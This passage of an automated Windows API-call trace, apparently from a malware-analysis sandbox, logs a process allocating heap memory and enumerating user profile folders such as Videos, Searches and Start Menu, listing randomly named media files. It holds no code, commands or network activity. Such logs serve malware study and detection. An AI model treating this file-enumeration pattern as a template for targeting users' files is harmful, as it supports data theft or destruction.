(in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318e48 | out: hHeap=0x630000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.299] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0094.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.299] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.299] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.299] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.299] PathFindFileNameW (pszPath="") returned="" [0094.299] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7efb8ce0, ftCreationTime.dwHighDateTime=0x1d5ba81, ftLastAccessTime.dwLowDateTime=0x37cdb3b0, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x37cdb3b0, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x11197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FuF.gif", cAlternateFileName="")) returned 0xffffffff [0094.299] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.300] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0094.300] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.300] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.300] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.300] PathFindFileNameW (pszPath="") returned="" [0094.300] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.300] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.300] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.300] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0094.300] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.300] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.301] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0094.301] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.301] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.301] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.301] PathFindFileNameW (pszPath="") returned="" [0094.301] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.301] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.301] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.301] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0094.301] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0094.301] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0094.301] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.301] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.301] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0094.301] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.301] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.302] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.302] PathFindFileNameW (pszPath="") returned="" [0094.302] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0094.302] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.302] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0094.302] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.302] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.302] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.302] PathFindFileNameW (pszPath="") returned="" [0094.302] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0094.302] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.302] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0094.302] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.302] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.302] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.302] PathFindFileNameW (pszPath="") returned="" [0094.302] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0094.303] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.303] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0094.303] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.303] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.303] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.303] PathFindFileNameW (pszPath="") returned="" [0094.303] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa03f1130, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa03f1130, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa03f1130, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa03f1130, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe02d4f50, ftCreationTime.dwHighDateTime=0x1d5be4e, ftLastAccessTime.dwLowDateTime=0x72c8a90, ftLastAccessTime.dwHighDateTime=0x1d5bf0c, ftLastWriteTime.dwLowDateTime=0x72c8a90, ftLastWriteTime.dwHighDateTime=0x1d5bf0c, nFileSizeHigh=0x0, nFileSizeLow=0x8b04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-FqI5Uj8Q.mkv", cAlternateFileName="-FQI5U~1.MKV")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532f5b60, ftCreationTime.dwHighDateTime=0x1d5bae4, ftLastAccessTime.dwLowDateTime=0xf4c331a0, ftLastAccessTime.dwHighDateTime=0x1d5b813, ftLastWriteTime.dwLowDateTime=0xf4c331a0, ftLastWriteTime.dwHighDateTime=0x1d5b813, nFileSizeHigh=0x0, nFileSizeLow=0x10184, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0HK4tuqZb.mp4", cAlternateFileName="0HK4TU~1.MP4")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb76c8940, ftCreationTime.dwHighDateTime=0x1d5c147, ftLastAccessTime.dwLowDateTime=0x10a8e410, ftLastAccessTime.dwHighDateTime=0x1d5baf7, ftLastWriteTime.dwLowDateTime=0x10a8e410, ftLastWriteTime.dwHighDateTime=0x1d5baf7, nFileSizeHigh=0x0, nFileSizeLow=0xa949, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="36oswwxbZIVtrKr3R6T.avi", cAlternateFileName="36OSWW~1.AVI")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fa22230, ftCreationTime.dwHighDateTime=0x1d5b7ec, ftLastAccessTime.dwLowDateTime=0xcc3dcee0, ftLastAccessTime.dwHighDateTime=0x1d5c207, ftLastWriteTime.dwLowDateTime=0xcc3dcee0, ftLastWriteTime.dwHighDateTime=0x1d5c207, nFileSizeHigh=0x0, nFileSizeLow=0x3dd4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Thswkk09oH.avi", cAlternateFileName="4THSWK~1.AVI")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd159c200, ftCreationTime.dwHighDateTime=0x1d5b8f0, ftLastAccessTime.dwLowDateTime=0x66154610, ftLastAccessTime.dwHighDateTime=0x1d5bf65, ftLastWriteTime.dwLowDateTime=0x66154610, ftLastWriteTime.dwHighDateTime=0x1d5bf65, nFileSizeHigh=0x0, nFileSizeLow=0x7e47, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="67YJ.mkv", cAlternateFileName="")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1b81380, ftCreationTime.dwHighDateTime=0x1d5bf4a, ftLastAccessTime.dwLowDateTime=0x51fa3850, ftLastAccessTime.dwHighDateTime=0x1d5bdb9, ftLastWriteTime.dwLowDateTime=0x51fa3850, ftLastWriteTime.dwHighDateTime=0x1d5bdb9, nFileSizeHigh=0x0, nFileSizeLow=0x2dfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6dK25uRTDl.swf", cAlternateFileName="6DK25U~1.SWF")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40c97910, ftCreationTime.dwHighDateTime=0x1d5be59, ftLastAccessTime.dwLowDateTime=0xf9740a30, ftLastAccessTime.dwHighDateTime=0x1d5c5e2, ftLastWriteTime.dwLowDateTime=0xf9740a30, ftLastWriteTime.dwHighDateTime=0x1d5c5e2, nFileSizeHigh=0x0, nFileSizeLow=0x18d16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7vpzR.mkv", cAlternateFileName="")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd27f500, ftCreationTime.dwHighDateTime=0x1d5c5e3, ftLastAccessTime.dwLowDateTime=0xfb8f8960, ftLastAccessTime.dwHighDateTime=0x1d5b7fb, ftLastWriteTime.dwLowDateTime=0xfb8f8960, ftLastWriteTime.dwHighDateTime=0x1d5b7fb, nFileSizeHigh=0x0, nFileSizeLow=0x10381, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8x4vGOYXgMiqx2szYMtl.flv", cAlternateFileName="8X4VGO~1.FLV")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce8166e0, ftCreationTime.dwHighDateTime=0x1d5b9af, ftLastAccessTime.dwLowDateTime=0x837fd9b0, ftLastAccessTime.dwHighDateTime=0x1d5b856, ftLastWriteTime.dwLowDateTime=0x837fd9b0, ftLastWriteTime.dwHighDateTime=0x1d5b856, nFileSizeHigh=0x0, nFileSizeLow=0x4193, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9siqfvi4c0aYkxA3.swf", cAlternateFileName="9SIQFV~1.SWF")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a01d860, ftCreationTime.dwHighDateTime=0x1d5b637, ftLastAccessTime.dwLowDateTime=0xa4a69270, ftLastAccessTime.dwHighDateTime=0x1d5bbf1, ftLastWriteTime.dwLowDateTime=0xa4a69270, ftLastWriteTime.dwHighDateTime=0x1d5bbf1, nFileSizeHigh=0x0, nFileSizeLow=0x3af0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F-YVCgA.swf", cAlternateFileName="")) returned 1 [0094.303] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11fcec0, ftCreationTime.dwHighDateTime=0x1d5c405, ftLastAccessTime.dwLowDateTime=0xcf592260, ftLastAccessTime.dwHighDateTime=0x1d5bd56, ftLastWriteTime.dwLowDateTime=0xcf592260, ftLastWriteTime.dwHighDateTime=0x1d5bd56, nFileSizeHigh=0x0, nFileSizeLow=0x99da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FSlps3zeN2JQFky.mp4", cAlternateFileName="FSLPS3~1.MP4")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, 